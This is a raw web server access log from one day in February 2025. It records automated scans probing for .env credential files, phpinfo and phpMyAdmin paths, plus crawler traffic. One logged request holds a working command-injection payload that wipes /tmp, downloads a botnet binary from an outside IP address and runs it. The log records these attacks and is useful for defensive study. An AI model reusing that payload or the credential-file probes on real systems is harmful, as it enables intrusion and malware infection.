78.153.140.203 - - [09/Feb/2025:06:33:25 +0100] "GET /Download/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
78.153.140.203 - - [09/Feb/2025:06:33:26 +0100] "GET /Env/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 OPR/35.0.2066.82"
78.153.140.203 - - [09/Feb/2025:06:33:27 +0100] "GET /Html/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; MZ601 Build/I.7.1-45) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.203 - - [09/Feb/2025:06:33:27 +0100] "GET /Inc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1"
78.153.140.203 - - [09/Feb/2025:06:33:27 +0100] "GET /Infos/ HTTP/1.1" 404 351 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.31 (KHTML, like Gecko) Version/11.0 Mobile/15A5327g Safari/604.1"
78.153.140.203 - - [09/Feb/2025:06:33:27 +0100] "GET /Lib/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPad; U; CPU OS 10_3_3 like Mac OS X; en-ph) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25"
78.153.140.203 - - [09/Feb/2025:06:33:27 +0100] "GET /Library/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0)"
78.153.140.203 - - [09/Feb/2025:06:33:27 +0100] "GET /Logging/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0"
78.153.140.203 - - [09/Feb/2025:06:33:28 +0100] "GET /Media/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3"
78.153.140.203 - - [09/Feb/2025:06:33:28 +0100] "GET /Misc/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Android 7.1.2; Mobile; rv:57.0) Gecko/57.0 Firefox/57.0"
78.153.140.203 - - [09/Feb/2025:06:33:28 +0100] "GET /New/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/6.1.3 Safari/537.75.14"
78.153.140.203 - - [09/Feb/2025:06:33:29 +0100] "GET /Phpinfo.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.5 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.5"
78.153.140.203 - - [09/Feb/2025:06:33:30 +0100] "GET /PHPinfo.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Touch)"
78.153.140.203 - - [09/Feb/2025:06:33:31 +0100] "GET /PHPINFO.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51"
78.153.140.203 - - [09/Feb/2025:06:33:31 +0100] "GET /Production/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 OPR/50.0.2762.45"
78.153.140.203 - - [09/Feb/2025:06:33:31 +0100] "GET /Public/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPad; CPU OS 11_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C5110b Safari/604.1"
78.153.140.203 - - [09/Feb/2025:06:33:31 +0100] "GET /Server/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 Zetakey/3.2"
78.153.140.203 - - [09/Feb/2025:06:33:31 +0100] "GET /Shared/.env HTTP/1.1" 404 356 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)"
78.153.140.203 - - [09/Feb/2025:06:33:32 +0100] "GET /Site/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.288.1 Safari/532.8"
78.153.140.203 - - [09/Feb/2025:06:33:32 +0100] "GET /Stage/.env HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; WebMoney Advisor)"
78.153.140.203 - - [09/Feb/2025:06:33:32 +0100] "GET /Staging/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SC-06D Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.203 - - [09/Feb/2025:06:33:32 +0100] "GET /Upload/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1"
78.153.140.203 - - [09/Feb/2025:06:33:34 +0100] "GET /Vendor/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPad; CPU OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C82 Safari/602.1"
78.153.140.203 - - [09/Feb/2025:06:33:34 +0100] "GET /Web/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15"
141.255.166.90 - - [09/Feb/2025:06:40:48 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [09/Feb/2025:06:46:38 +0100] "GET /renault.2web.at/stats/lang/awstats-lt.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:07:03:08 +0100] "GET /ed.activities.at/stats/lang/awstats-lt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.44 - - [09/Feb/2025:07:13:52 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
179.43.191.146 - - [09/Feb/2025:07:27:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.198 - - [09/Feb/2025:07:43:52 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
94.181.187.69 - - [09/Feb/2025:07:44:04 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
46.19.138.234 - - [09/Feb/2025:07:45:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [09/Feb/2025:07:48:53 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
156.59.198.136 - - [09/Feb/2025:07:53:00 +0100] "GET /docs/contadino/2017/RE17-000011.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:08:03:26 +0100] "GET /docs/contadino/2017/RE17-000018.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:08:10:59 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001311803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:08:19:22 +0100] "GET /renault.2web.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [09/Feb/2025:08:31:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.198 - - [09/Feb/2025:08:34:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
176.65.137.206 - - [09/Feb/2025:08:39:57 +0100] "GET /api.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64)"
176.65.137.206 - - [09/Feb/2025:08:40:02 +0100] "GET /api.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64)"
92.255.57.58 - - [09/Feb/2025:08:49:38 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.94.145.109 - - [09/Feb/2025:08:54:12 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.109 - - [09/Feb/2025:08:54:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.109 - - [09/Feb/2025:08:54:15 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.109 - - [09/Feb/2025:08:54:15 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.109 - - [09/Feb/2025:08:54:16 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.135 - - [09/Feb/2025:08:55:03 +0100] "GET /ed.activities.at/stats/lang/awstats-ca.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:08:59:04 +0100] "GET /ed.activities.at/stats/lang/awstats-ro.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:09:03:04 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00004.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:09:07:21 +0100] "GET /renault.2web.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:09:13:25 +0100] "GET /renault.2web.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:09:17:26 +0100] "GET /docs/contadino/2017/RE17-000028.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.38 - - [09/Feb/2025:09:36:36 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.196.220.253 - - [09/Feb/2025:09:42:48 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [09/Feb/2025:09:46:31 +0100] "GET /docs/contadino/2017/RE17-000033.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
8.155.11.0 - - [09/Feb/2025:09:50:37 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.241.65.218/selfreps/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5" 400 383 "-" "-"
8.155.11.0 - - [09/Feb/2025:09:50:57 +0100] "-" 408 - "-" "-"
8.155.11.0 - - [09/Feb/2025:09:51:01 +0100] "-" 408 - "-" "-"
156.59.198.135 - - [09/Feb/2025:09:54:23 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008051103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [09/Feb/2025:09:56:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [09/Feb/2025:10:00:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105280903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [09/Feb/2025:10:02:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.20.67 - - [09/Feb/2025:10:09:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0"
65.49.20.67 - - [09/Feb/2025:10:12:34 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.94 Safari/537.36"
65.49.20.67 - - [09/Feb/2025:10:13:10 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0"
65.49.20.67 - - [09/Feb/2025:10:13:44 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0"
65.49.20.67 - - [09/Feb/2025:10:13:47 +0100] "GET /phpinfo.php HTTP/1.1" 200 10250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
65.49.20.67 - - [09/Feb/2025:10:13:51 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.135 - - [09/Feb/2025:10:22:52 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00006.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:10:49:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104191503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.198 - - [09/Feb/2025:10:52:38 +0100] "GET /system.ini?loginuse&loginpas&apos HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
156.59.198.136 - - [09/Feb/2025:10:53:09 +0100] "GET /docs/contadino/2017/RE17-000034.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:10:57:09 +0100] "GET /ed.activities.at/stats/lang/awstats-si.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.135.95.25 - - [09/Feb/2025:11:02:41 +0100] "\x16\x03\x01\x05\xc4\x01" 400 383 "-" "-"
45.135.95.25 - - [09/Feb/2025:11:02:46 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0"
45.135.95.25 - - [09/Feb/2025:11:02:52 +0100] "GET / HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.135 - - [09/Feb/2025:11:17:36 +0100] "GET /renault.activities.at/htdocs/activities/gui/frames/phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [09/Feb/2025:11:28:57 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36"
156.59.198.136 - - [09/Feb/2025:11:48:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106281403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [09/Feb/2025:11:50:08 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
47.128.49.167 - - [09/Feb/2025:11:52:47 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.30.245 - - [09/Feb/2025:11:56:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
101.199.254.243 - - [09/Feb/2025:12:00:20 +0100] "\x16\x03\x01\x015\x01" 400 383 "-" "-"
101.199.254.209 - - [09/Feb/2025:12:00:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
101.199.254.230 - - [09/Feb/2025:12:00:43 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
47.128.99.65 - - [09/Feb/2025:12:00:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
101.199.254.205 - - [09/Feb/2025:12:00:50 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.199.254.200 - - [09/Feb/2025:12:00:54 +0100] "GET /sitemap.xml HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
101.199.254.243 - - [09/Feb/2025:12:00:57 +0100] "GET /config.json HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
47.128.47.141 - - [09/Feb/2025:12:04:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:12:08:46 +0100] "GET /docs/contadino/2017/RE17-000014.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.227.191.4 - - [09/Feb/2025:12:22:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
64.227.191.4 - - [09/Feb/2025:12:22:30 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (compatible)"
64.227.191.4 - - [09/Feb/2025:12:22:30 +0100] "GET /ads.txt HTTP/1.1" 404 290 "-" "Mozilla/5.0 (compatible)"
156.59.198.135 - - [09/Feb/2025:12:23:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004161103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [09/Feb/2025:12:25:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [09/Feb/2025:12:54:55 +0100] "GET /docs/contadino/2017/RE17-000020.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [09/Feb/2025:12:58:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001211603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [09/Feb/2025:13:02:56 +0100] "GET /ed.activities.at/stats/lang/awstats-fr.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [09/Feb/2025:13:24:07 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
35.240.127.158 - - [09/Feb/2025:13:38:36 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
35.244.17.211 - - [09/Feb/2025:13:39:26 +0100] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:26 +0100] "GET /phpMyAdmin6.0/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:27 +0100] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:27 +0100] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:27 +0100] "GET /phpMyAdmin-5.2.1/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:28 +0100] "GET /phpMyAdmin-4.9.10-all-languages/index.php?lang=en HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:28 +0100] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:28 +0100] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:29 +0100] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:29 +0100] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:29 +0100] "GET /1phpmyadmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:29 +0100] "GET /phpMyAdmin-latest-english/index.php?lang=en HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
35.244.17.211 - - [09/Feb/2025:13:39:30 +0100] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
